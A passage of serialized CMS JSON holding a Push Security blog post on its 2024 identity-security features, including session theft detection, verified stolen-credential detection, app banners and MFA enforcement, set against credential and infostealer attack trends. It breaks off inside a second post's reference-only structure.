",{"data":125952,"content":125953,"nodeType":186},{"uri":81621},[125954],{"data":125955,"marks":125956,"value":125958,"nodeType":173},{},[125957],{"type":194},"short, fast attack chains",{"data":125960,"marks":125961,"value":125962,"nodeType":173},{},[]," that are emblematic of today’s identity attacks.",{"data":125964,"content":125965,"nodeType":231},{},[],{"data":125967,"content":125968,"nodeType":169},{},[125969],{"data":125970,"marks":125971,"value":125972,"nodeType":173},{},[],"Defending against stolen sessions and stolen credentials",{"data":125974,"content":125975,"nodeType":178},{},[125976,125980,125988],{"data":125977,"marks":125978,"value":125979,"nodeType":173},{},[],"With as little as $10 to buy a stolen password and a little skill, attackers capitalized on the use of stolen credentials last year. Stolen creds were the No. 1 attacker action in 2023 and 2024, according to ",{"data":125981,"content":125983,"nodeType":186},{"uri":125982},"https://www.verizon.com/business/en-gb/resources/reports/dbir/",[125984],{"data":125985,"marks":125986,"value":1300,"nodeType":173},{},[125987],{"type":194},{"data":125989,"marks":125990,"value":1477,"nodeType":173},{},[],{"data":125992,"content":125993,"nodeType":178},{},[125994,125998,126006],{"data":125995,"marks":125996,"value":125997,"nodeType":173},{},[],"Nowhere was this more plain than in the ",{"data":125999,"content":126000,"nodeType":186},{"uri":819},[126001],{"data":126002,"marks":126003,"value":126005,"nodeType":173},{},[126004],{"type":194},"attacks on Snowflake customers",{"data":126007,"marks":126008,"value":126009,"nodeType":173},{},[],", one of the biggest breaches of last year. In this incident, cyber criminals targeted around 165 customers of the cloud-based data warehouse tool Snowflake by taking over accounts using credentials harvested from infostealer infections dating as far back as 2020.",{"data":126011,"content":126012,"nodeType":178},{},[126013],{"data":126014,"marks":126015,"value":126016,"nodeType":173},{},[],"The Snowflake incident underscored the challenges of control and visibility that security teams face when attempting to secure identities on a patchwork of managed and unmanaged apps:",{"data":126018,"content":126019,"nodeType":250},{},[126020,126030,126040,126050,126060],{"data":126021,"content":126022,"nodeType":254},{},[126023],{"data":126024,"content":126025,"nodeType":178},{},[126026],{"data":126027,"marks":126028,"value":126029,"nodeType":173},{},[],"Do I know all the workforce accounts my employees use?",{"data":126031,"content":126032,"nodeType":254},{},[126033],{"data":126034,"content":126035,"nodeType":178},{},[126036],{"data":126037,"marks":126038,"value":126039,"nodeType":173},{},[],"Do those accounts have a strong security posture?",{"data":126041,"content":126042,"nodeType":254},{},[126043],{"data":126044,"content":126045,"nodeType":178},{},[126046],{"data":126047,"marks":126048,"value":126049,"nodeType":173},{},[],"Do those accounts use MFA? The most phishing-resistant methods?",{"data":126051,"content":126052,"nodeType":254},{},[126053],{"data":126054,"content":126055,"nodeType":178},{},[126056],{"data":126057,"marks":126058,"value":126059,"nodeType":173},{},[],"Do I have tools to detect, respond, and remediate after an account takeover or breach of a critical software vendor?",{"data":126061,"content":126062,"nodeType":254},{},[126063],{"data":126064,"content":126065,"nodeType":178},{},[126066],{"data":126067,"marks":126068,"value":126069,"nodeType":173},{},[],"Do I know when a session has been stolen, pointing to a device compromised by infostealer malware?",{"data":126071,"content":126072,"nodeType":178},{},[126073],{"data":126074,"marks":126075,"value":126076,"nodeType":173},{},[],"Here’s what we delivered last year to make it easier for security teams to protect their organizations from the threat of stolen sessions and stolen creds.",{"data":126078,"content":126079,"nodeType":231},{},[],{"data":126081,"content":126082,"nodeType":169},{},[126083],{"data":126084,"marks":126085,"value":126086,"nodeType":173},{},[],"Detecting stolen sessions",{"data":126088,"content":126089,"nodeType":235},{},[126090],{"data":126091,"marks":126092,"value":77025,"nodeType":173},{},[126093],{"type":370},{"data":126095,"content":126096,"nodeType":178},{},[126097,126100,126109],{"data":126098,"marks":126099,"value":37,"nodeType":173},{},[],{"data":126101,"content":126103,"nodeType":186},{"uri":126102},"https://pushsecurity.com/blog/what-the-rise-of-infostealers-says-about-identity-attacks/",[126104],{"data":126105,"marks":126106,"value":126108,"nodeType":173},{},[126107],{"type":194},"Infostealer malware",{"data":126110,"marks":126111,"value":126112,"nodeType":173},{},[]," — a type of malware designed to collect user credentials, including session cookies, from end-user devices — had a very successful 2024, accounting for nearly 10 percent of activity that Red Canary was able to associate with named threats, and the majority of all detected malware that Sophos threat researchers documented last year.",{"data":126114,"content":126115,"nodeType":178},{},[126116,126120,126129],{"data":126117,"marks":126118,"value":126119,"nodeType":173},{},[],"While the use of stolen credentials is rampant, often facilitated by successful infostealer campaigns, a related attack type also ",{"data":126121,"content":126123,"nodeType":186},{"uri":126122},"https://pushsecurity.com/blog/what-the-rise-of-infostealers-says-about-identity-attacks/#id-the-state-of-infostealers-today",[126124],{"data":126125,"marks":126126,"value":126128,"nodeType":173},{},[126127],{"type":194},"jumped in prevalence",{"data":126130,"marks":126131,"value":126132,"nodeType":173},{},[]," last year: session token theft attacks.",{"data":126134,"content":126135,"nodeType":178},{},[126136],{"data":126137,"marks":126138,"value":126139,"nodeType":173},{},[],"Using stolen tokens, adversaries don’t need to bypass MFA directly. They can simply import the tokens into their browser and assume an already authorized session. ",{"data":126141,"content":126142,"nodeType":235},{},[126143],{"data":126144,"marks":126145,"value":24287,"nodeType":173},{},[126146],{"type":370},{"data":126148,"content":126149,"nodeType":178},{},[126150],{"data":126151,"marks":126152,"value":126153,"nodeType":173},{},[],"In order to detect a stolen session in use, you need telemetry that allows you to tie activity to a trusted endpoint. This didn’t previously exist, and you have to be in the browser to do it. So that’s what we built. ",{"data":126155,"content":126156,"nodeType":178},{},[126157,126160,126169],{"data":126158,"marks":126159,"value":4729,"nodeType":173},{},[],{"data":126161,"content":126162,"nodeType":186},{"uri":4751},[126163],{"data":126164,"marks":126165,"value":126168,"nodeType":173},{},[126166,126167],{"type":194},{"type":370},"session theft detection",{"data":126170,"marks":126171,"value":126172,"nodeType":173},{},[]," capability uses the power of the Push browser extension to inject a unique marker into the user-agent string of sessions that occur in browsers enrolled in Push. ",{"data":126174,"content":126175,"nodeType":178},{},[126176],{"data":126177,"marks":126178,"value":126179,"nodeType":173},{},[],"By analyzing logs from your IdP in your SIEM, you can then identify activity from the same session that both has and that lacks the Push marker, indicating that a session has been extracted from the browser and maliciously imported into a different browser that is not enrolled in Push.",{"data":126181,"content":126182,"nodeType":178},{},[126183],{"data":126184,"marks":126185,"value":126186,"nodeType":173},{},[],"This is a reliable signal that a stolen session token is being used and an endpoint has been compromised.",{"data":126188,"content":126191,"nodeType":312},{"target":126189},{"sys":126190},{"id":105035,"type":317,"linkType":318},[],{"data":126193,"content":126197,"nodeType":312},{"target":126194},{"sys":126195},{"id":126196,"type":317,"linkType":318},"6dOEnPzZXd9DqeSdalqlzO",[],{"data":126199,"content":126200,"nodeType":231},{},[],{"data":126202,"content":126203,"nodeType":169},{},[126204],{"data":126205,"marks":126206,"value":126207,"nodeType":173},{},[],"Detecting compromised credentials",{"data":126209,"content":126210,"nodeType":235},{},[126211],{"data":126212,"marks":126213,"value":77025,"nodeType":173},{},[126214],{"type":370},{"data":126216,"content":126217,"nodeType":178},{},[126218],{"data":126219,"marks":126220,"value":126221,"nodeType":173},{},[],"Alongside stolen session cookies, stolen credentials made a lot of headlines last year. The 2024 Verizon DBIR found that 79% of web application compromises were the result of breached creds, and researchers at IBM found a 71% year-over-year increase in cyberattacks using stolen or compromised credentials.",{"data":126223,"content":126224,"nodeType":178},{},[126225,126229,126237],{"data":126226,"marks":126227,"value":126228,"nodeType":173},{},[],"In Push’s own research, we counted ",{"data":126230,"content":126231,"nodeType":186},{"uri":71244},[126232],{"data":126233,"marks":126234,"value":126236,"nodeType":173},{},[126235],{"type":194},"30 public identity-related breaches",{"data":126238,"marks":126239,"value":126240,"nodeType":173},{},[]," in 2024 where the breach and the breach vector were disclosed. Of those, nearly three-quarters were the result of compromised credentials, including notable breaches such as Microsoft, Change Healthcare, and the attacks on Snowflake customers.",{"data":126242,"content":126243,"nodeType":3769},{},[126244],{"data":126245,"content":126246,"nodeType":178},{},[126247],{"data":126248,"marks":126249,"value":126250,"nodeType":173},{},[],"73% of public identity-related breaches in 2024 were the result of compromised credentials (the rest were phishing attacks). ",{"data":126252,"content":126253,"nodeType":178},{},[126254,126258,126266],{"data":126255,"marks":126256,"value":126257,"nodeType":173},{},[],"The influx of compromised credentials has been amplified by the ",{"data":126259,"content":126260,"nodeType":186},{"uri":126102},[126261],{"data":126262,"marks":126263,"value":126265,"nodeType":173},{},[126264],{"type":194},"rise of infostealers",{"data":126267,"marks":126268,"value":126269,"nodeType":173},{},[],", which contribute the vast majority of valid stolen credentials, alongside mass credential phishing campaigns and third-party data breach dumps. ",{"data":126271,"content":126272,"nodeType":178},{},[126273],{"data":126274,"marks":126275,"value":126276,"nodeType":173},{},[],"And while there’s no shortage of threat intelligence about stolen credentials for sale on the web, security teams struggle to separate the needle from the haystack because a large portion of TI on stolen creds is out of date.",{"data":126278,"content":126279,"nodeType":178},{},[126280],{"data":126281,"marks":126282,"value":126283,"nodeType":173},{},[],"In evaluating TI data here at Push, we reviewed 5,763 username and password combos that matched domains in use by Push customers. We found that less than 1% of the creds in a multi-vendor dataset were true positives. In other words, 99.5% of the stolen creds we checked were false positives at the time of review — illustrating the challenge security teams face when trying to extract actionable intelligence from this kind of data. ",{"data":126285,"content":126286,"nodeType":3769},{},[126287],{"data":126288,"content":126289,"nodeType":178},{},[126290],{"data":126291,"marks":126292,"value":126293,"nodeType":173},{},[],"99.5% of the findings in compromised credential feeds were found to be false positives.",{"data":126295,"content":126296,"nodeType":235},{},[126297],{"data":126298,"marks":126299,"value":24287,"nodeType":173},{},[126300],{"type":370},{"data":126302,"content":126303,"nodeType":178},{},[126304],{"data":126305,"marks":126306,"value":126307,"nodeType":173},{},[],"Using its browser agent, Push assesses the strength of end-user passwords by creating and analyzing a truncated, salted SHA256 hash of the password for a given account. (These k-anonymized fingerprints are never seen by Push’s back-end and exist only in local browser extension storage.) ",{"data":126309,"content":126310,"nodeType":178},{},[126311,126315,126324],{"data":126312,"marks":126313,"value":126314,"nodeType":173},{},[],"These fingerprints give Push a directly observable source of truth for corporate creds, which allowed us to build a ",{"data":126316,"content":126317,"nodeType":186},{"uri":62639},[126318],{"data":126319,"marks":126320,"value":126323,"nodeType":173},{},[126321,126322],{"type":194},{"type":370},"verified stolen credential detection",{"data":126325,"marks":126326,"value":126327,"nodeType":173},{},[]," capability last year that removes all false positives from TI sources to pinpoint only those stolen creds still actively in use by employees.",{"data":126329,"content":126333,"nodeType":312},{"target":126330},{"sys":126331},{"id":126332,"type":317,"linkType":318},"3BITHZvDadjHpOAqIn0g4w",[],{"data":126335,"content":126336,"nodeType":231},{},[],{"data":126338,"content":126339,"nodeType":169},{},[126340],{"data":126341,"marks":126342,"value":126343,"nodeType":173},{},[],"Reducing and securing shadow IT and account sprawl",{"data":126345,"content":126346,"nodeType":178},{},[126347],{"data":126348,"marks":126349,"value":126350,"nodeType":173},{},[],"You can think of this last part of the story as the ground from which the attack trends we’ve been talking about emerged: The shift to doing business almost entirely in the browser, and the resulting sprawl in accounts and unmanaged apps, leading to an explosion of internet-facing identities for threat actors to target.",{"data":126352,"content":126353,"nodeType":178},{},[126354],{"data":126355,"marks":126356,"value":126357,"nodeType":173},{},[],"Even in organizations with mature security practices, the challenge of getting 100% compliance with identity posture best practices is evident. Last year, Push researchers analyzed a data set of 300,000 accounts from our customer base and found that:",{"data":126359,"content":126360,"nodeType":250},{},[126361,126380,126399],{"data":126362,"content":126363,"nodeType":254},{},[126364],{"data":126365,"content":126366,"nodeType":178},{},[126367,126371,126376],{"data":126368,"marks":126369,"value":126370,"nodeType":173},{},[],"Organizations have ",{"data":126372,"marks":126373,"value":126375,"nodeType":173},{},[126374],{"type":370},"more apps and identities than they thought",{"data":126377,"marks":126378,"value":126379,"nodeType":173},{},[]," — an average of ~15 identities per employee and ~220 apps per organization.",{"data":126381,"content":126382,"nodeType":254},{},[126383],{"data":126384,"content":126385,"nodeType":178},{},[126386,126390,126395],{"data":126387,"marks":126388,"value":126389,"nodeType":173},{},[],"Many accounts ",{"data":126391,"marks":126392,"value":126394,"nodeType":173},{},[126393],{"type":370},"lack basic security protections",{"data":126396,"marks":126397,"value":126398,"nodeType":173},{},[],", with 37% of accounts lacking any form of MFA and ~9% of accounts using a password that is leaked, weak, or reused, making them especially susceptible to account takeover. On accounts where password is the only login method in use (e.g. not using SSO or any other federated login like OIDC), there was no MFA in use in 4 out of 5 cases.",{"data":126400,"content":126401,"nodeType":254},{},[126402],{"data":126403,"content":126404,"nodeType":178},{},[126405,126409,126414,126418,126425],{"data":126406,"marks":126407,"value":126408,"nodeType":173},{},[],"Security ",{"data":126410,"marks":126411,"value":126413,"nodeType":173},{},[126412],{"type":370},"gaps persist even with SSO",{"data":126415,"marks":126416,"value":126417,"nodeType":173},{},[]," accounts — with 10% of SSO-using accounts also having a local password, a risk for ",{"data":126419,"content":126420,"nodeType":186},{"uri":4342},[126421],{"data":126422,"marks":126423,"value":835,"nodeType":173},{},[126424],{"type":194},{"data":126426,"marks":126427,"value":126428,"nodeType":173},{},[],"; and 1 in 5 IdP accounts themselves missing MFA.",{"data":126430,"content":126431,"nodeType":178},{},[126432],{"data":126433,"marks":126434,"value":126435,"nodeType":173},{},[],"From our perspective, organizations need scalable controls, and they need easy-to-deploy tools that get them visibility of all their workforce identities, apps, and accounts alongside telemetry that makes the information actionable.",{"data":126437,"content":126438,"nodeType":178},{},[126439],{"data":126440,"marks":126441,"value":126442,"nodeType":173},{},[],"Push already provides a real-time inventory of all your accounts and apps, including internal corporate apps, and analyzes the security posture, login methods, and MFA status of those accounts to offer a comprehensive picture of your identity attack surface. ",{"data":126444,"content":126445,"nodeType":178},{},[126446],{"data":126447,"marks":126448,"value":126449,"nodeType":173},{},[],"To help customers enforce their security policies even more seamlessly, here’s what we built last year:",{"data":126451,"content":126452,"nodeType":235},{},[126453],{"data":126454,"marks":126455,"value":126457,"nodeType":173},{},[126456],{"type":370},"1. App banners",{"data":126459,"content":126460,"nodeType":178},{},[126461,126465,126475],{"data":126462,"marks":126463,"value":126464,"nodeType":173},{},[],"With a range of modes from informing to blocking, ",{"data":126466,"content":126468,"nodeType":186},{"uri":126467},"https://pushsecurity.com/help/10106#start",[126469],{"data":126470,"marks":126471,"value":126474,"nodeType":173},{},[126472,126473],{"type":194},{"type":370},"app banners",{"data":126476,"marks":126477,"value":126478,"nodeType":173},{},[]," allow security teams to communicate best practices and policies with end-users directly in their browser. It works by displaying a banner with your custom message on the login and signup pages for workplace apps. ",{"data":126480,"content":126481,"nodeType":178},{},[126482],{"data":126483,"marks":126484,"value":126485,"nodeType":173},{},[],"Using configuration rules, you can set conditions for how banner controls get applied. Common use cases include: Restricting use of GenAI software; carving out an exception for admins on a specific app; reminding users to log in with SSO instead of a password, and others. ",{"data":126487,"content":126491,"nodeType":312},{"target":126488},{"sys":126489},{"id":126490,"type":317,"linkType":318},"4RPHmeMLyZmb5V8rXYLtey",[],{"data":126493,"content":126494,"nodeType":235},{},[126495,126500],{"data":126496,"marks":126497,"value":126499,"nodeType":173},{},[126498],{"type":370},"2. Password manager identification",{"data":126501,"marks":126502,"value":3107,"nodeType":173},{},[],{"data":126504,"content":126505,"nodeType":178},{},[126506,126510,126520],{"data":126507,"marks":126508,"value":126509,"nodeType":173},{},[],"We also expanded Push’s capability to observe employees’ account security posture by adding an identification of ",{"data":126511,"content":126513,"nodeType":186},{"uri":126512},"https://pushsecurity.com/blog/stop-users-saving-corp-creds-into-personal-password-managers/",[126514],{"data":126515,"marks":126516,"value":126519,"nodeType":173},{},[126517,126518],{"type":194},{"type":370},"which password manager",{"data":126521,"marks":126522,"value":126523,"nodeType":173},{},[]," (if any) they’re using. ",{"data":126525,"content":126526,"nodeType":178},{},[126527],{"data":126528,"marks":126529,"value":126530,"nodeType":173},{},[],"We’ve heard from many security teams that they’re concerned about corporate credentials being stored in unapproved password managers — not to mention the ROI from ensuring employees are all using the corporate password manager you already pay for. This feature helps them achieve both objectives.",{"data":126532,"content":126533,"nodeType":235},{},[126534],{"data":126535,"marks":126536,"value":126538,"nodeType":173},{},[126537],{"type":370},"3. MFA enforcement",{"data":126540,"content":126541,"nodeType":178},{},[126542,126546,126554],{"data":126543,"marks":126544,"value":126545,"nodeType":173},{},[],"Finally, we rounded out 2024 with a new security control called ",{"data":126547,"content":126548,"nodeType":186},{"uri":77513},[126549],{"data":126550,"marks":126551,"value":2570,"nodeType":173},{},[126552,126553],{"type":194},{"type":370},{"data":126555,"marks":126556,"value":126557,"nodeType":173},{},[]," that builds on the popular app banners concept by detecting when users lack MFA and then prompting them to register for MFA. ",{"data":126559,"content":126560,"nodeType":178},{},[126561],{"data":126562,"marks":126563,"value":126564,"nodeType":173},{},[],"Admins choose which apps they wish to enforce MFA on, and the Push extension does the rest. ",{"data":126566,"content":126567,"nodeType":178},{},[126568],{"data":126569,"marks":126570,"value":126571,"nodeType":173},{},[],"Security teams we work with are especially eager to use this feature to close MFA coverage gaps on non-SSO and otherwise unmanaged applications.",{"data":126573,"content":126577,"nodeType":312},{"target":126574},{"sys":126575},{"id":126576,"type":317,"linkType":318},"4imhff7SWJi2Gan5iFEs2P",[],{"data":126579,"content":126580,"nodeType":231},{},[],{"data":126582,"content":126583,"nodeType":169},{},[126584],{"data":126585,"marks":126586,"value":126587,"nodeType":173},{},[],"Want to see more?",{"data":126589,"content":126590,"nodeType":178},{},[126591,126595,126602],{"data":126592,"marks":126593,"value":126594,"nodeType":173},{},[],"There’s a lot we didn’t touch on here that Push can help you achieve. If you’d like to learn more, ",{"data":126596,"content":126597,"nodeType":186},{"uri":473},[126598],{"data":126599,"marks":126600,"value":126601,"nodeType":173},{},[],"set up a demo with our team",{"data":126603,"marks":126604,"value":126605,"nodeType":173},{},[]," or sign up yourself to have a look at the platform.","How real-world attacks and research drove Push’s most popular features of 2024","How in-the-wild attacks and our own R&D inspired what we built in 2024 to stop account takeover and reduce security risks across your workforce identities. ","push-features-2024",{"items":126610},[126611,126613],{"sys":126612,"name":509},{"id":508},{"sys":126614,"name":26137},{"id":26136},{"items":126616},[126617],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":126618},{"url":2911},{"__typename":1528,"sys":126620,"content":126621,"title":4774,"synopsis":4775,"hashTags":118,"publishedDate":4776,"slug":4777,"tagsCollection":127311,"authorsCollection":127315},{"id":3979},{"json":126622},{"data":126623,"content":126624,"nodeType":165},{},[126625,126630,126646,126652,126658,126663,126666,126673,126679,126695,126705,126711,126717,126723,126807,126810,126817,126892,126897,126900,126907,126914,126920,126926,126933,126949,126955,126962,126968,126974,126981,126987,126993,127009,127014,127017,127024,127031,127037,127126,127132,127139,127145,127151,127156,127163,127169,127175,127181,127188,127194,127200,127206,127212,127217,127220,127227,127233,127263,127269,127284,127300,127305],{"data":126626,"content":126629,"nodeType":312},{"target":126627},{"sys":126628},{"id":3988,"type":317,"linkType":318},[],{"data":126631,"content":126632,"nodeType":178},{},[126633,126636,126643],{"data":126634,"marks":126635,"value":3996,"nodeType":173},{},[],{"data":126637,"content":126638,"nodeType":186},{"uri":3999},[126639],{"data":126640,"marks":126641,"value":4005,"nodeType":173},{},[126642],{"type":194},{"data":126644,"marks":126645,"value":4009,"nodeType":173},{},[],{"data":126647,"content":126648,"nodeType":178},{},[126649],{"data":126650,"marks":126651,"value":4016,"nodeType":173},{},[],{"data":126653,"content":126654,"nodeType":178},{},[126655],{"data":126656,"marks":126657,"value":4023,"nodeType":173},{},[],{"data":126659,"content":126662,"nodeType":312},{"target":126660},{"sys":126661},{"id":4028,"type":317,"linkType":318},[],{"data":126664,"content":126665,"nodeType":231},{},[],{"data":126667,"content":126668,"nodeType":169},{},[126669],{"data":126670,"marks":126671,"value":4040,"nodeType":173},{},[126672],{"type":370},{"data":126674,"content":126675,"nodeType":178},{},[126676],{"data":126677,"marks":126678,"value":4047,"nodeType":173},{},[],{"data":126680,"content":126681,"nodeType":178},{},[126682,126685,126692],{"data":126683,"marks":126684,"value":4054,"nodeType":173},{},[],{"data":126686,"content":126687,"nodeType":186},{"uri":4057},[126688],{"data":126689,"marks":126690,"value":4063,"nodeType":173},{},[126691],{"type":194},{"data":126693,"marks":126694,"value":197,"nodeType":173},{},[],{"data":126696,"content":126697,"nodeType":3769},{},[126698],{"data":126699,"content":126700,"nodeType":178},{},[126701],{"data":126702,"marks":126703,"value":4077,"nodeType":173},{},[126704],{"type":370},{"data":126706,"content":126707,"nodeType":178},{},[126708],{"data":126709,"marks":126710,"value":4084,"nodeType":173},{},[],{"data":126712,"content":126713,"nodeType":178},{},[126714],{"data":126715,"marks":126716,"value":4091,"nodeType":173},{},[],{"data":126718,"content":126719,"nodeType":178},{},[126720],{"data":126721,"marks":126722,"value":4098,"nodeType":173},{},[],{"data":126724,"content":126725,"nodeType":250},{},[126726,126735,126744,126753,126762,126771,126780,126789,126798],{"data":126727,"content":126728,"nodeType":254},{},[126729],{"data":126730,"content":126731,"nodeType":178},{},[126732],{"data":126733,"marks":126734,"value":4111,"nodeType":173},{},[],{"data":126736,"content":126737,"nodeType":254},{},[126738],{"data":126739,"content":126740,"nodeType":178},{},[126741],{"data":126742,"marks":126743,"value":4121,"nodeType":173},{},[],{"data":126745,"content":126746,"nodeType":254},{},[126747],{"data":126748,"content":126749,"nodeType":178},{},[126750],{"data":126751,"marks":126752,"value":4131,"nodeType":173},{},[],{"data":126754,"content":126755,"nodeType":254},{},[126756],{"data":126757,"content":126758,"nodeType":178},{},[126759],{"data":126760,"marks":126761,"value":4141,"nodeType":173},{},[],{"data":126763,"content":126764,"nodeType":254},{},[126765],{"data":126766,"content":126767,"nodeType":178},{},[126768],{"data":126769,"marks":126770,"value":4151,"nodeType":173},{},[],{"data":126772,"content":126773,"nodeType":254},{},[126774],{"data":126775,"content":126776,"nodeType":178},{},[126777],{"data":126778,"marks":126779,"value":4161,"nodeType":173},{},[],{"data":126781,"content":126782,"nodeType":254},{},[126783],{"data":126784,"content":126785,"nodeType":178},{},[126786],{"data":126787,"marks":126788,"value":4171,"nodeType":173},{},[],{"data":126790,"content":126791,"nodeType":254},{},[126792],{"data":126793,"content":126794,"nodeType":178},{},[126795],{"data":126796,"marks":126797,"value":4181,"nodeType":173},{},[],{"data":126799,"content":126800,"nodeType":254},{},[126801],{"data":126802,"content":126803,"nodeType":178},{},[126804],{"data":126805,"marks":126806,"value":4191,"nodeType":173},{},[],{"data":126808,"content":126809,"nodeType":231},{},[],{"data":126811,"content":126812,"nodeType":169},{},[126813],{"data":126814,"marks":126815,"value":4202,"nodeType":173},{},[126816],{"type":370},{"data":126818,"content":126819,"nodeType":250},{},[126820,126829,126838,126847,126856,126865,126874,126883],{"data":126821,"content":126822,"nodeType":254},{},[126823],{"data":126824,"content":126825,"nodeType":178},{},[126826],{"data":126827,"marks":126828,"value":4215,"nodeType":173},{},[],{"data":126830,"content":126831,"nodeType":254},{},[126832],{"data":126833,"content":126834,"nodeType":178},{},[126835],{"data":126836,"marks":126837,"value":4225,"nodeType":173},{},[],{"data":126839,"content":126840,"nodeType":254},{},[126841],{"data":126842,"content":126843,"nodeType":178},{},[126844],{"data":126845,"marks":126846,"value":4235,"nodeType":173},{},[],{"data":126848,"content":126849,"nodeType":254},{},[126850],{"data":126851,"content":126852,"nodeType":178},{},[126853],{"data":126854,"marks":126855,"value":4245,"nodeType":173},{},[],{"data":126857,"content":126858,"nodeType":254},{},[126859],{"data":126860,"content":126861,"nodeType":178},{},[126862],{"data":126863,"marks":126864,"value":4255,"nodeType":173},{},[],{"data":126866,"content":126867,"nodeType":254},{},[126868],{"data":126869,"content":126870,"nodeType":178},{},[126871],{"data":126872,"marks":126873,"value":4265,"nodeType":173},{},[],{"data":126875,"content":126876,"nodeType":254},{},[126877],{"data":126878,"content":126879,"nodeType":178},{},[126880],{"data":126881,"marks":126882,"value":4275,"nodeType":173},{},[],{"data":126884,"content":126885,"nodeType":254},{},[126886],{"data":126887,"content":126888,"nodeType":178},{},[126889],{"data":126890,"marks":126891,"value":4285,"nodeType":173},{},[],{"data":126893,"content":126896,"nodeType":312},{"target":126894},{"sys":126895},{"id":4290,"type":317,"linkType":318},[],{"data":126898,"content":126899,"nodeType":231},{},[],{"data":126901,"content":126902,"nodeType":169},{},[126903],{"data":126904,"marks":126905,"value":4302,"nodeType":173},{},[126906],{"type":370},{"data":126908,"content":126909,"nodeType":235},{},[126910],{"data":126911,"marks":126912,"value":4310,"nodeType":173},{},[126913],{"type":370},{"data":126915,"content":126916,"nodeType":178},{},[126917],{"data":126918,"marks":126919,"value":4317,"nodeType":173},{},[],{"data":126921,"content":126922,"nodeType":178},{},[126923],{"data":126924,"marks":126925,"value":4324,"nodeType":173},{},[],{"data":126927,"content":126928,"nodeType":235},{},[126929],{"data":126930,"marks":126931,"value":4332,"nodeType":173},{},[126932],{"type":370},{"data":126934,"content":126935,"nodeType":178},{},[126936,126939,126946],{"data":126937,"marks":126938,"value":4339,"nodeType":173},{},[],{"data":126940,"content":126941,"nodeType":186},{"uri":4342},[126942],{"data":126943,"marks":126944,"value":835,"nodeType":173},{},[126945],{"type":194},{"data":126947,"marks":126948,"value":197,"nodeType":173},{},[],{"data":126950,"content":126951,"nodeType":178},{},[126952],{"data":126953,"marks":126954,"value":4357,"nodeType":173},{},[],{"data":126956,"content":126957,"nodeType":235},{},[126958],{"data":126959,"marks":126960,"value":4365,"nodeType":173},{},[126961],{"type":370},{"data":126963,"content":126964,"nodeType":178},{},[126965],{"data":126966,"marks":126967,"value":4372,"nodeType":173},{},[],{"data":126969,"content":126970,"nodeType":178},{},[126971],{"data":126972,"marks":126973,"value":4379,"nodeType":173},{},[],{"data":126975,"content":126976,"nodeType":235},{},[126977],{"data":126978,"marks":126979,"value":4387,"nodeType":173},{},[126980],{"type":370},{"data":126982,"content":126983,"nodeType":178},{},[126984],{"data":126985,"marks":126986,"value":4394,"nodeType":173},{},[],{"data":126988,"content":126989,"nodeType":178},{},[126990],{"data":126991,"marks":126992,"value":4401,"nodeType":173},{},[],{"data":126994,"content":126995,"nodeType":178},{},[126996,126999,127006],{"data":126997,"marks":126998,"value":4408,"nodeType":173},{},[],{"data":127000,"content":127001,"nodeType":186},{"uri":4411},[127002],{"data":127003,"marks":127004,"value":4417,"nodeType":173},{},[127005],{"type":194},{"data":127007,"marks":127008,"value":4421,"nodeType":173},{},[],{"data":127010,"content":127013,"nodeType":312},{"target":127011},{"sys":127012},{"id":4426,"type":317,"linkType":318},[],{"data":127015,"content":127016,"nodeType":231},{},[],{"data":127018,"content":127019,"nodeType":169},{},[127020],{"data":127021,"marks":127022,"value":4438,"nodeType":173},{},[127023],{"type":370},{"data":127025,"content":127026,"nodeType":235},{},[127027],{"data":127028,"marks":127029,"value":4446,"nodeType":173},{},[127030],{"type":370},{"data":127032,"content":127033,"nodeType":178},{},[127034],{"data":127035,"marks":127036,"value":4453,"nodeType":173},{},[],{"data":127038,"content":127039,"nodeType":250},{},[127040,127059,127078,127107],{"data":127041,"content":127042,"nodeType":254},{},[127043],{"data":127044,"content":127045,"nodeType":178},{},[127046,127049,127056],{"data":127047,"marks":127048,"value":4466,"nodeType":173},{},[],{"data":127050,"content":127051,"nodeType":186},{"uri":4469},[127052],{"data":127053,"marks":127054,"value":4475,"nodeType":173},{},[127055],{"type":194},{"data":127057,"marks":127058,"value":4479,"nodeType":173},{},[],{"data":127060,"content":127061,"nodeType":254},{},[127062],{"data":127063,"content":127064,"nodeType":178},{},[127065,127068,127075],{"data":127066,"marks":127067,"value":4489,"nodeType":173},{},[],{"data":127069,"content":127070,"nodeType":186},{"uri":4492},[127071],{"data":127072,"marks":127073,"value":4498,"nodeType":173},{},[127074],{"type":194},{"data":127076,"marks":127077,"value":1477,"nodeType":173},{},[],{"data":127079,"content":127080,"nodeType":254},{},[127081],{"data":127082,"content":127083,"nodeType":178},{},[127084,127087,127094,127097,127104],{"data":127085,"marks":127086,"value":4511,"nodeType":173},{},[],{"data":127088,"content":127089,"nodeType":186},{"uri":4342},[127090],{"data":127091,"marks":127092,"value":4519,"nodeType":173},{},[127093],{"type":194},{"data":127095,"marks":127096,"value":4523,"nodeType":173},{},[],{"data":127098,"content":127099,"nodeType":186},{"uri":4526},[127100],{"data":127101,"marks":127102,"value":4532,"nodeType":173},{},[127103],{"type":194},{"data":127105,"marks":127106,"value":4536,"nodeType":173},{},[],{"data":127108,"content":127109,"nodeType":254},{},[127110],{"data":127111,"content":127112,"nodeType":178},{},[127113,127116,127123],{"data":127114,"marks":127115,"value":4546,"nodeType":173},{},[],{"data":127117,"content":127118,"nodeType":186},{"uri":4492},[127119],{"data":127120,"marks":127121,"value":4554,"nodeType":173},{},[127122],{"type":194},{"data":127124,"marks":127125,"value":4558,"nodeType":173},{},[],{"data":127127,"content":127128,"nodeType":178},{},[127129],{"data":127130,"marks":127131,"value":4565,"nodeType":173},{},[],{"data":127133,"content":127134,"nodeType":235},{},[127135],{"data":127136,"marks":127137,"value":4573,"nodeType":173},{},[127138],{"type":370},{"data":127140,"content":127141,"nodeType":178},{},[127142],{"data":127143,"marks":127144,"value":4580,"nodeType":173},{},[],{"data":127146,"content":127147,"nodeType":178},{},[127148],{"data":127149,"marks":127150,"value":4587,"nodeType":173},{},[],{"data":127152,"content":127155,"nodeType":312},{"target":127153},{"sys":127154},{"id":4592,"type":317,"linkType":318},[],{"data":127157,"content":127158,"nodeType":235},{},[127159],{"data":127160,"marks":127161,"value":4601,"nodeType":173},{},[127162],{"type":370},{"data":127164,"content":127165,"nodeType":178},{},[127166],{"data":127167,"marks":127168,"value":4608,"nodeType":173},{},[],{"data":127170,"content":127171,"nodeType":178},{},[127172],{"data":127173,"marks":127174,"value":4615,"nodeType":173},{},[],{"data":127176,"content":127177,"nodeType":178},{},[127178],{"data":127179,"marks":127180,"value":4622,"nodeType":173},{},[],{"data":127182,"content":127183,